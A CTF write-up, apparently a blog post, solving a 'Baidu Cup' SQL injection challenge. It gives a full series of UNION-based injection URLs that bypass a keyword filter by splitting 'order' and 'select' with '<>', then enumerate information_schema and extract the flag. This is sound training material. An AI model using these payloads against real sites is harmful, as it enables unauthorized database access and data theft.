  • CTF Web Journey 2

    Challenge address

    https://www.ichunqiu.com/battalion?t=1
    "Baidu Cup" CTF competition, September round. Challenge name: SQL injection

    http://e00e80716fe747c7b1d3c1b31b43468842689873f4a546ae.changame.ichunqiu.com/index.php?id=1

    The page echoes its content normally.

    http://e00e80716fe747c7b1d3c1b31b43468842689873f4a546ae.changame.ichunqiu.com/index.php?id=-1

    Nothing is echoed back, which indicates an injection point.

    Determine the number of columns

    http://e00e80716fe747c7b1d3c1b31b43468842689873f4a546ae.changame.ichunqiu.com/index.php?id=1 ord<>er by 3

    Split order with <> so that it is not filtered out.

    Determine the display position

    http://e00e80716fe747c7b1d3c1b31b43468842689873f4a546ae.changame.ichunqiu.com/index.php?id=-1 union sel<>ect 1,2,3

    2 is echoed back, so column 2 is the display position.

    Dump the database name

    http://e00e80716fe747c7b1d3c1b31b43468842689873f4a546ae.changame.ichunqiu.com/index.php?id=-1 union sel<>ect 1,database(),3

    Dump the tables

    http://e00e80716fe747c7b1d3c1b31b43468842689873f4a546ae.changame.ichunqiu.com/index.php?id=-1 union sel<>ect 1,table_name,3 from information_schema.tables where table_schema=database()

    Dump the columns

    http://e00e80716fe747c7b1d3c1b31b43468842689873f4a546ae.changame.ichunqiu.com/index.php?id=-1 union sel<>ect 1,column_name,3 from information_schema.columns where table_name='info'

    Dump the final data

    http://e00e80716fe747c7b1d3c1b31b43468842689873f4a546ae.changame.ichunqiu.com/index.php?id=-1 union sel<>ect 1,flAg_T5ZNdrm,3 from info

    This returns the flag.

    The figure below shows the structure of the information_schema database.

  • Original article: https://www.cnblogs.com/akger/p/14335668.html